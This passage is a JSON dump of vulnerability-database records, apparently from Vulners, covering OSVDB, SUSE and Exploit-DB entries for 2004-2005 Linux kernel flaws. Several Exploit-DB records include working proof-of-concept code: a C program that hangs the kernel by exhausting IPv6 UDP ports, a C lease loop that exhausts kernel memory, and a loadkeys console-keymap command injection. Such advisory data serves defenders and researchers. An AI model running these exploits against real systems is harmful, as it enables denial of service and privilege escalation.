ID:13654](https://secuniaresearch.flexerasoftware.com/advisories/13654/)\n[Secunia Advisory ID:11202](https://secuniaresearch.flexerasoftware.com/advisories/11202/)\n[Secunia Advisory ID:12904](https://secuniaresearch.flexerasoftware.com/advisories/12904/)\n[Secunia Advisory ID:19369](https://secuniaresearch.flexerasoftware.com/advisories/19369/)\n[Related OSVDB ID: 11014](https://vulners.com/osvdb/OSVDB:11014)\n[Related OSVDB ID: 11016](https://vulners.com/osvdb/OSVDB:11016)\nOther Advisory URL: http://www.suse.de/de/security/2004_37_kernel.html\n[CVE-2004-0887](https://vulners.com/cve/CVE-2004-0887)\n", "modified": "2004-10-21T05:55:30", "published": "2004-10-21T05:55:30", "id": "OSVDB:11015", "href": "https://vulners.com/osvdb/OSVDB:11015", "title": "Linux Kernel S/390 Unspecified Function Local Privilege Escalation", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:15", "bulletinFamily": "software", "cvelist": ["CVE-2005-2555"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.13-rc7\nVendor Specific News/Changelog Entry: http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=6fc0b4a7a73a81e74d0004732df358f4f9975be2\n[Vendor Specific Advisory URL](http://www.ubuntulinux.org/support/documentation/usn/usn-169-1)\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1018)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2006/dsa-1017)\n[Secunia Advisory ID:16608](https://secuniaresearch.flexerasoftware.com/advisories/16608/)\n[Secunia Advisory ID:17002](https://secuniaresearch.flexerasoftware.com/advisories/17002/)\n[Secunia Advisory ID:17826](https://secuniaresearch.flexerasoftware.com/advisories/17826/)\n[Secunia Advisory ID:19374](https://secuniaresearch.flexerasoftware.com/advisories/19374/)\n[Secunia Advisory ID:16494](https://secuniaresearch.flexerasoftware.com/advisories/16494/)\n[Secunia Advisory ID:17073](https://secuniaresearch.flexerasoftware.com/advisories/17073/)\n[Secunia Advisory ID:19369](https://secuniaresearch.flexerasoftware.com/advisories/19369/)\n[Secunia Advisory ID:16663](https://secuniaresearch.flexerasoftware.com/advisories/16663/)\nRedHat RHSA: RHSA-2005:663\nRedHat RHSA: RHSA-2005:514\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2005_50_kernel.html\nOther Advisory URL: http://wwwnew.mandriva.com/security/advisories?name=MDKSA-2005:219\n[CVE-2005-2555](https://vulners.com/cve/CVE-2005-2555)\n", "modified": "2005-08-06T09:48:18", "published": "2005-08-06T09:48:18", "href": "https://vulners.com/osvdb/OSVDB:18978", "id": "OSVDB:18978", "title": "Linux Kernel CAP_NET_ADMIN Socket Policy Bypass", "type": "osvdb", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "cvelist": ["CVE-2005-1761"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.12.1\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1018)\nSecurity Tracker: 1014275\n[Secunia Advisory ID:17002](https://secuniaresearch.flexerasoftware.com/advisories/17002/)\n[Secunia Advisory ID:16570](https://secuniaresearch.flexerasoftware.com/advisories/16570/)\n[Secunia Advisory ID:15786](https://secuniaresearch.flexerasoftware.com/advisories/15786/)\n[Secunia Advisory ID:17073](https://secuniaresearch.flexerasoftware.com/advisories/17073/)\n[Secunia Advisory ID:18056](https://secuniaresearch.flexerasoftware.com/advisories/18056/)\n[Secunia Advisory ID:19369](https://secuniaresearch.flexerasoftware.com/advisories/19369/)\n[Related OSVDB ID: 17478](https://vulners.com/osvdb/OSVDB:17478)\nRedHat RHSA: RHSA-2005:663\nRedHat RHSA: RHSA-2005:514\nOther Advisory URL: http://rhn.redhat.com/errata/RHSA-2005-551.html\nOther Advisory URL: http://www.debian.org/security/2005/dsa-922\n[CVE-2005-1761](https://vulners.com/cve/CVE-2005-1761)\n", "modified": "2005-06-20T09:35:14", "published": "2005-06-20T09:35:14", "href": "https://vulners.com/osvdb/OSVDB:17479", "id": "OSVDB:17479", "title": "Linux Kernel ptrace / restore_sigcontext ar.rsc Access Issue", "type": "osvdb", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:16", "bulletinFamily": "software", "cvelist": ["CVE-2005-3257"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=0b360adbdb54d5b98b78d57ba0916bc4b8871968\nVendor Specific News/Changelog Entry: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=334113\nVendor Specific News/Changelog Entry: http://kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.14-git12.log\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1018)\n[Vendor Specific Advisory URL](http://www.smoothwall.org/updates/2.0/fixes8.html)\n[Vendor Specific Advisory URL](http://www.ubuntulinux.org/usn/usn-231-1)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2006/dsa-1017)\n[Secunia Advisory ID:17826](https://secuniaresearch.flexerasoftware.com/advisories/17826/)\n[Secunia Advisory ID:19374](https://secuniaresearch.flexerasoftware.com/advisories/19374/)\n[Secunia Advisory ID:18203](https://secuniaresearch.flexerasoftware.com/advisories/18203/)\n[Secunia Advisory ID:17995](https://secuniaresearch.flexerasoftware.com/advisories/17995/)\n[Secunia Advisory ID:19369](https://secuniaresearch.flexerasoftware.com/advisories/19369/)\n[Secunia Advisory ID:17226](https://secuniaresearch.flexerasoftware.com/advisories/17226/)\n[Secunia Advisory ID:19185](https://secuniaresearch.flexerasoftware.com/advisories/19185/)\nOther Advisory URL: http://wwwnew.mandriva.com/security/advisories?name=MDKSA-2005:219\n[CVE-2005-3257](https://vulners.com/cve/CVE-2005-3257)\n", "modified": "2005-10-15T11:37:58", "published": "2005-10-15T11:37:58", "href": "https://vulners.com/osvdb/OSVDB:20061", "id": "OSVDB:20061", "type": "osvdb", "title": "Linux Kernel loadkeys Console Keyboard Mapping Local Privilege Escalation", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "cvelist": ["CVE-2005-3806"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=blobdiff;h=bbbe80cdaf72a75a463aff9551e60b31e2f69061;hp=f841bde30c18493a94fd5d522b84724a8eb82a4a;hb=4ea6a8046bb49d43c950898f0cb4e1994ef6c89d;f=net/ipv6/ip6_flowlabel.c\nVendor Specific News/Changelog Entry: http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=4ea6a8046bb49d43c950898f0cb4e1994ef6c89d\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1018)\n[Vendor Specific Advisory URL](http://wwwnew.mandriva.com/security/advisories?name=MDKSA-2006:044)\n[Vendor Specific Advisory URL](http://lists.suse.com/archive/suse-security-announce/2005-Dec/0002.html)\n[Vendor Specific Advisory URL](http://www.ubuntulinux.org/usn/usn-231-1)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2006/dsa-1017)\n[Secunia Advisory ID:17918](https://secuniaresearch.flexerasoftware.com/advisories/17918/)\n[Secunia Advisory ID:18510](https://secuniaresearch.flexerasoftware.com/advisories/18510/)\n[Secunia Advisory ID:19374](https://secuniaresearch.flexerasoftware.com/advisories/19374/)\n[Secunia Advisory ID:18203](https://secuniaresearch.flexerasoftware.com/advisories/18203/)\n[Secunia Advisory ID:18562](https://secuniaresearch.flexerasoftware.com/advisories/18562/)\n[Secunia Advisory ID:18977](https://secuniaresearch.flexerasoftware.com/advisories/18977/)\n[Secunia Advisory ID:18684](https://secuniaresearch.flexerasoftware.com/advisories/18684/)\n[Secunia Advisory ID:19369](https://secuniaresearch.flexerasoftware.com/advisories/19369/)\nRedHat RHSA: RHSA-2006:0101\nRedHat RHSA: RHSA-2006:0140\nRedHat RHSA: RHSA-2006:0190\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2005-Dec/0004.html\n[CVE-2005-3806](https://vulners.com/cve/CVE-2005-3806)\nBugtraq ID: 15729\n", "modified": "2005-12-06T11:15:51", "published": "2005-12-06T11:15:51", "href": "https://vulners.com/osvdb/OSVDB:21516", "id": "OSVDB:21516", "title": "Linux Kernel IPv6 Flow Label Handling Local DoS", "type": "osvdb", "cvss": {"score": 6.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "cvelist": ["CVE-2005-3857"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=174337\nVendor Specific News/Changelog Entry: http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.15-rc3\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1018)\n[Vendor Specific Advisory URL](http://www.ubuntulinux.org/usn/usn-231-1)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2006/dsa-1017)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060402-01-U.asc)\n[Secunia Advisory ID:17787](https://secuniaresearch.flexerasoftware.com/advisories/17787/)\n[Secunia Advisory ID:18510](https://secuniaresearch.flexerasoftware.com/advisories/18510/)\n[Secunia Advisory ID:19374](https://secuniaresearch.flexerasoftware.com/advisories/19374/)\n[Secunia Advisory ID:17786](https://secuniaresearch.flexerasoftware.com/advisories/17786/)\n[Secunia Advisory ID:18203](https://secuniaresearch.flexerasoftware.com/advisories/18203/)\n[Secunia Advisory ID:18562](https://secuniaresearch.flexerasoftware.com/advisories/18562/)\n[Secunia Advisory ID:17995](https://secuniaresearch.flexerasoftware.com/advisories/17995/)\n[Secunia Advisory ID:19369](https://secuniaresearch.flexerasoftware.com/advisories/19369/)\n[Secunia Advisory ID:19607](https://secuniaresearch.flexerasoftware.com/advisories/19607/)\n[Related OSVDB ID: 21284](https://vulners.com/osvdb/OSVDB:21284)\nRedHat RHSA: RHSA-2006:0101\nRedHat RHSA: RHSA-2006:0140\nMail List Post: http://marc.theaimsgroup.com/?l=linux-kernel&m=113175851920568&w=2\nMail List Post: http://marc.theaimsgroup.com/?l=linux-kernel&m=113190437101622&w=2\nMail List Post: http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=f3a9388e4ebea57583272007311fffa26ebbb305\n[CVE-2005-3857](https://vulners.com/cve/CVE-2005-3857)\n", "modified": "2005-11-12T08:21:21", "published": "2005-11-12T08:21:21", "href": "https://vulners.com/osvdb/OSVDB:21285", "id": "OSVDB:21285", "title": "Linux Kernel time_out_leases Function Broken Lease Saturation Local DoS", "type": "osvdb", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:57:02", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1058", "CVE-2005-3358", "CVE-2005-3858", "CVE-2005-3623", "CVE-2005-3356", "CVE-2005-2553", "CVE-2005-3848", "CVE-2005-4605", "CVE-2005-3808", "CVE-2005-3847"], "description": "The Linux kernel has been updated to fix various security problems.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2006-02-27T14:26:20", "published": "2006-02-27T14:26:20", "id": "SUSE-SA:2006:012", "href": "http://lists.opensuse.org/opensuse-security-announce/2006-02/msg00021.html", "type": "suse", "title": "various security problems in kernel", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:28:40", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3784", "CVE-2005-3783", "CVE-2005-3181", "CVE-2005-3805", "CVE-2005-3807", "CVE-2005-3527", "CVE-2005-3044", "CVE-2005-3806", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-3055", "CVE-2005-3271"], "description": "This kernel update for SUSE Linux 10.0 contains fixes for XEN, various security fixes and bug fixes.\n#### Solution\nNone, please install the fixed packages.", "edition": 1, "modified": "2005-12-06T11:35:56", "published": "2005-12-06T11:35:56", "id": "SUSE-SA:2005:067", "href": "http://lists.opensuse.org/opensuse-security-announce/2005-12/msg00009.html", "type": "suse", "title": "denial of service in kernel", "cvss": {"score": 6.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:39", "bulletinFamily": "unix", "cvelist": ["CVE-2005-2457", "CVE-2005-0916", "CVE-2005-1765", "CVE-2005-2459", "CVE-2005-2456", "CVE-2005-2458", "CVE-2005-2555"], "description": "The Linux kernel was updated to fix the following security issues: - CAN-2005-2457: A problem in decompression of files on \"zisofs\" filesystem was fixed.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2005-09-01T14:31:41", "published": "2005-09-01T14:31:41", "id": "SUSE-SA:2005:050", "href": "http://lists.opensuse.org/opensuse-security-announce/2005-09/msg00012.html", "title": "denial of service, local privilege escalation in kernel", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:50:28", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3784", "CVE-2005-3783", "CVE-2005-2457", "CVE-2005-2872", "CVE-2005-3805", "CVE-2005-2490", "CVE-2005-1041", "CVE-2005-3275", "CVE-2005-3110", "CVE-2005-3807", "CVE-2005-3527", "CVE-2005-3044", "CVE-2005-3806", "CVE-2005-2800", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-2492", "CVE-2005-2459", "CVE-2005-3055", "CVE-2005-2458"], "description": "The Linux kernel was updated to fix several security problems and several bugs, listed below:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2005-12-14T15:10:59", "published": "2005-12-14T15:10:59", "id": "SUSE-SA:2005:068", "href": "http://lists.opensuse.org/opensuse-security-announce/2005-12/msg00011.html", "type": "suse", "title": "denial of service in kernel", "cvss": {"score": 6.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T03:43:02", "description": "Linux Kernel 2.6.x Sysctl Unregistration Local Denial of Service Vulnerability. CVE-2005-2709. Dos exploit for linux platform", "published": "2005-11-09T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2709"], "modified": "2005-11-09T00:00:00", "id": "EDB-ID:26489", "href": "https://www.exploit-db.com/exploits/26489/", "sourceData": "source: http://www.securityfocus.com/bid/15365/info\r\n\r\nLinux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from a failure to properly unregister kernel resources when network devices are removed.\r\n\r\nThis issue allows local attackers to deny service to legitimate users. Attackers may also be able to execute arbitrary code in the context of the kernel, but this has not been confirmed. \r\n\r\n/*\r\n * Linux kernel\r\n * IPv6 UDP port selection infinite loop\r\n * local denial of service vulnerability\r\n * proof of concept code\r\n * version 1.0 (Oct 29 2005)\r\n * CVE ID: CAN-2005-2973\r\n *\r\n * by Remi Denis-Courmont < exploit at simphalempin dot com >\r\n * http://www.simphalempin.com/dev/\r\n *\r\n * Vulnerable:\r\n * - Linux < 2.6.14 with IPv6\r\n *\r\n * Not vulnerable:\r\n * - Linux >= 2.6.14\r\n * - Linux without IPv6\r\n *\r\n * Fix:\r\n * http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;\r\n * a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2\r\n */\r\n\r\n\r\n/*****************************************************************************\r\n * Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. *\r\n * *\r\n * Redistribution and use in source and binary forms, with or without *\r\n * modification, are permitted provided that the following conditions *\r\n * are met: *\r\n * 1. Redistributions of source code must retain the above copyright notice, *\r\n * this list of conditions and the following disclaimer. *\r\n * 2. Redistribution in binary form must reproduce the above copyright *\r\n * notice, this list of conditions and the following disclaimer in the *\r\n * documentation and/or other materials provided with the distribution. *\r\n * *\r\n * The author's liability shall not be incurred as a result of loss of due *\r\n * the total or partial failure to fulfill anyone's obligations and direct *\r\n * or consequential loss due to the software's use or performance. *\r\n * *\r\n * The current situation as regards scientific and technical know-how at the *\r\n * time when this software was distributed did not enable all possible uses *\r\n * to be tested and verified, nor for the presence of any or all faults to *\r\n * be detected. In this respect, people's attention is drawn to the risks *\r\n * associated with loading, using, modifying and/or developing and *\r\n * reproducing this software. *\r\n * The user shall be responsible for verifying, by any or all means, the *\r\n * software's suitability for its requirements, its due and proper *\r\n * functioning, and for ensuring that it shall not cause damage to either *\r\n * persons or property. *\r\n * *\r\n * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR *\r\n * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES *\r\n * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. *\r\n * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, *\r\n * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT *\r\n * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *\r\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY *\r\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT *\r\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF *\r\n * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *\r\n * *\r\n * The author does not either expressly or tacitly warrant that this *\r\n * software does not infringe any or all third party intellectual right *\r\n * relating to a patent, software or to any or all other property right. *\r\n * Moreover, the author shall not hold someone harmless against any or all *\r\n * proceedings for infringement that may be instituted in respect of the *\r\n * use, modification and redistrbution of this software. *\r\n *****************************************************************************/\r\n\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n\r\n#include <errno.h>\r\n#include <sys/time.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/resource.h>\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n\r\nstatic int\r\nbind_udpv6_port (uint16_t port)\r\n{\r\n\tint fd;\r\n\r\n\tfd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\r\n\tif (fd != -1)\r\n\t{\r\n\t\tstruct sockaddr_in6 addr;\r\n\t\tint val = 1;\r\n\r\n\t\tsetsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val));\r\n\r\n\t\tmemset (&addr, 0, sizeof (addr));\r\n\t\taddr.sin6_family = AF_INET6;\r\n\t\taddr.sin6_port = htons (port);\r\n\t\tif (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0)\r\n\t\t\treturn fd;\r\n\r\n\t\tclose (fd);\r\n\t}\r\n\treturn -1;\r\n}\r\n\r\n\r\nstatic int\r\nget_fd_limit (void)\r\n{\r\n\tstruct rlimit lim;\r\n\r\n\tgetrlimit (RLIMIT_NOFILE, &lim);\r\n\tlim.rlim_cur = lim.rlim_max;\r\n\tsetrlimit (RLIMIT_NOFILE, &lim);\r\n\treturn (int)lim.rlim_max;\r\n}\r\n\r\n\r\nstatic void\r\nget_port_range (uint16_t *range)\r\n{\r\n\tFILE *stream;\r\n\r\n\t/* conservative defaults */\r\n\trange[0] = 1024;\r\n\trange[1] = 65535;\r\n\r\n\tstream = fopen (\"/proc/sys/net/ipv4/ip_local_port_range\", \"r\");\r\n\tif (stream != NULL)\r\n\t{\r\n\t\tunsigned i[2];\r\n\r\n\t\tif ((fscanf (stream, \"%u %u\", i, i + 1) == 2)\r\n\t\t && (i[0] <= i[1]) && (i[1] < 65535))\r\n\t\t{\r\n\t\t\trange[0] = (uint16_t)i[0];\r\n\t\t\trange[1] = (uint16_t)i[1];\r\n\t\t}\r\n\t\tfclose (stream);\r\n\t}\r\n}\r\n\r\n\r\n/* The criticial is fairly simple to raise : the infinite loop occurs when\r\n * calling bind with no speficied port number (ie zero), if and only if the\r\n * IPv6 stack cannot find any free UDP port within the local port range\r\n * (normally 32768-61000). Because this requires times more sockets than what\r\n * a process normally can open at a given time, we have to spawn several\r\n * processes. Then, the simplest way to trigger the crash condition consists\r\n * of opening up kernel-allocated UDP ports until it crashes, but that is\r\n * fairly slow (because allocation are stored in small a hash table of lists,\r\n * that are checked at each allocation). A much faster scheme involves getting\r\n * the local port range from /proc, allocating one by one, and only then, ask\r\n * for automatic (any/zero) port allocation.\r\n */\r\nstatic int\r\nproof (void)\r\n{\r\n\tint lim, val = 2;\r\n\tpid_t pid, ppid;\r\n\tuint16_t range[2], port;\r\n\r\n\tlim = get_fd_limit ();\r\n\tif (lim <= 3)\r\n\t\treturn -2;\r\n\r\n\tget_port_range (range);\r\n\r\n\tport = range[0];\r\n\tppid = getpid ();\r\n\r\n\tputs (\"Stage 1...\");\r\n\tdo\r\n\t{\r\n\t\tswitch (pid = fork ())\r\n\t\t{\r\n\t\t\tcase 0:\r\n\t\t\t\tfor (val = 3; val < lim; val++)\r\n\t\t\t\t\tclose (val);\r\n\r\n\t\t\t\tdo\r\n\t\t\t\t{\r\n\t\t\t\t\tif (bind_udpv6_port (port) >= 0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif (port)\r\n\t\t\t\t\t\t\tport++;\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\tif (port && (errno == EADDRINUSE))\r\n\t\t\t\t\t\tport++; /* skip already used port */\r\n\t\t\t\t\telse\r\n\t\t\t\t\tif (errno != EMFILE)\r\n\t\t\t\t\t\t/* EAFNOSUPPORT -> no IPv6 stack */\r\n\t\t\t\t\t\t/* EADDRINUSE -> not vulnerable */\r\n\t\t\t\t\t\texit (1);\r\n\r\n\t\t\t\t\tif (port > range[1])\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tputs (\"Stage 2... should crash quickly\");\r\n\t\t\t\t\t\tport = 0;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\twhile (errno != EMFILE);\r\n\r\n\t\t\t\tbreak; /* EMFILE: spawn new process */\r\n\r\n\t\t\tcase -1:\r\n\t\t\t\texit (2);\r\n\r\n\t\t\tdefault:\r\n\t\t\t\twait (&val);\r\n\t\t\t\tif (ppid != getpid ())\r\n\t\t\t\t\texit (WIFEXITED (val) ? WEXITSTATUS (val) : 2);\r\n\t\t}\r\n\t}\r\n\twhile (pid == 0);\r\n\r\n\tputs (\"System not vulnerable\");\r\n\treturn -val;\r\n}\r\n\r\nint\r\nmain (int argc, char *argv[])\r\n{\r\n\tsetvbuf (stdout, NULL, _IONBF, 0);\r\n\tputs (\"Linux kernel IPv6 UDP port infinite loop vulnerability\\n\"\r\n\t \"proof of concept code\\n\"\r\n\t \"Copyright (C) 2005 Remi Denis-Courmont \"\r\n\t \"<\\x65\\x78\\x70\\x6c\\x6f\\x69\\x74\\x40\\x73\\x69\\x6d\\x70\"\r\n\t \"\\x68\\x61\\x6c\\x65\\x6d\\x70\\x69\\x6e\\x2e\\x63\\x6f\\x6d>\\n\");\r\n\r\n\treturn -proof ();\r\n}\r\n\r\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26489/"}, {"lastseen": "2016-02-03T03:24:37", "description": "Linux Kernel 2.6 Console Keymap Local Command Injection Vulnerability. CVE-2005-3257. Local exploit for linux platform", "published": "2005-10-17T00:00:00", "type": "exploitdb", "title": "Linux Kernel <= 2.6 - Console Keymap Local Command Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3257"], "modified": "2005-10-17T00:00:00", "id": "EDB-ID:26353", "href": "https://www.exploit-db.com/exploits/26353/", "sourceData": "source: http://www.securityfocus.com/bid/15122/info\r\n\r\nThe Linux kernel is susceptible to a local command-injection vulnerability via console keymap modifications. This issue occurs because unprivileged users can alter the system-wide console keymap.\r\n\r\nLocal users may modify the console keymap to include scripted macro commands. This allows attackers to execute arbitrary commands with the privileges of the user that uses the console after them, potentially facilitating privilege escalation. \r\n\r\nloadkeys <<EOF\r\nkeycode 15 = F23\r\nstring F23 = \"^V^C^V^Mecho hello world^V^M\"\r\nEOF ", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26353/"}, {"lastseen": "2016-02-03T04:04:06", "description": "Linux Kernel 2.6.x Time_Out_Leases PrintK Local Denial of Service Vulnerability. CVE-2005-3857. Dos exploit for linux platform", "published": "2005-11-29T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.x - Time_Out_Leases PrintK Local Denial of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3857"], "modified": "2005-11-29T00:00:00", "id": "EDB-ID:26648", "href": "https://www.exploit-db.com/exploits/26648/", "sourceData": "source: http://www.securityfocus.com/bid/15627/info\r\n\r\nLinux kernel is susceptible to a local denial-of-service vulnerability.\r\n\r\nLocal attackers may trigger this issue by obtaining numerous file-lock leases, which will consume excessive kernel log memory. Once the leases timeout, the event will be logged, and kernel memory will be consumed.\r\n\r\nThis issue allows local attackers to consume excessive kernel memory, eventually leading to an out-of-memory condition and a denial of service for legitimate users.\r\n\r\nKernel versions prior to 2.6.15-rc3 are vulnerable to this issue. \r\n\r\n#include <unistd.h>\r\n\r\n#include <stdlib.h>\r\n\r\n#include <linux/fcntl.h>\r\n\r\nint main(int ac, char **av)\r\n\r\n{\r\n\r\n char *fname = av[0];\r\n\r\n int fd = open(fname, O_RDONLY);\r\n\r\n int r;\r\n\r\n \r\n\r\n while (1) {\r\n\r\n r = fcntl(fd, F_SETLEASE, F_RDLCK);\r\n\r\n if (r == -1) {\r\n\r\n perror(\"F_SETLEASE, F_RDLCK\");\r\n\r\n exit(1);\r\n\r\n }\r\n\r\n r = fcntl(fd, F_SETLEASE, F_UNLCK);\r\n\r\n if (r == -1) {\r\n\r\n perror(\"F_SETLEASE, F_UNLCK\");\r\n\r\n exit(1);\r\n\r\n }\r\n\r\n }\r\n\r\n return 0;\r\n\r\n}\r\n\r\n\r\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/26648/"}, {"lastseen": "2016-02-03T03:28:30", "description": "Linux Kernel 2.6.x IPV6 Local Denial of Service Vulnerability. CVE-2005-2973. Dos exploit for linux platform", "published": "2005-10-20T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.x - IPv6 Local Denial of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2973"], "modified": "2005-10-20T00:00:00", "id": "EDB-ID:26382", "href": "https://www.exploit-db.com/exploits/26382/", "sourceData": "source: http://www.securityfocus.com/bid/15156/info\r\n\r\nLinux Kernel is reported prone to a local denial-of-service vulnerability.\r\n\r\nThis issue arises from an infinite loop when binding IPv6 UDP ports. \r\n\r\n/*\r\n * Linux kernel\r\n * IPv6 UDP port selection infinite loop\r\n * local denial of service vulnerability\r\n * proof of concept code\r\n * version 1.0 (Oct 29 2005)\r\n * CVE ID: CAN-2005-2973\r\n *\r\n * by Remi Denis-Courmont < exploit at simphalempin dot com >\r\n * http://www.simphalempin.com/dev/\r\n *\r\n * Vulnerable:\r\n * - Linux < 2.6.14 with IPv6\r\n *\r\n * Not vulnerable:\r\n * - Linux >= 2.6.14\r\n * - Linux without IPv6\r\n *\r\n * Fix:\r\n * http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;\r\n * a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2\r\n */\r\n\r\n\r\n/*****************************************************************************\r\n * Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. *\r\n * *\r\n * Redistribution and use in source and binary forms, with or without *\r\n * modification, are permitted provided that the following conditions *\r\n * are met: *\r\n * 1. Redistributions of source code must retain the above copyright notice, *\r\n * this list of conditions and the following disclaimer. *\r\n * 2. Redistribution in binary form must reproduce the above copyright *\r\n * notice, this list of conditions and the following disclaimer in the *\r\n * documentation and/or other materials provided with the distribution. *\r\n * 